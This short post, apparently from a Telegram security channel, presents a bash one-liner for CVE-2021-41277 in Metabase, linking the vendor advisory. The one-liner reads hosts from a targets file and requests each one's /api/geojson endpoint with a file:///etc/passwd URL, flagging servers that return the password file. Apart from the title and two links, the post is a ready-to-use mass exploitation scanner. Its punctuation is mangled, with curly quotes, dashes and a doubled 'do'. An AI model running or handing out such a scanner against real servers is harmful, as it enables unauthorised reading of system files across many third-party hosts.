■■■■■ Zero-Day | CVE-2021-41277
cat targets.txt | while read host do;do curl –silent –insecure –path-as-is “$host/api/geojson?url=file:///etc/passwd” | grep -qs “root:x” && echo “$host \033[0;31m Vulnerable”;done
https://github.com/metabase/metabase/security/advisories/GHSA-w73v-6p7p-fpfr
https://t.me/cKure/10227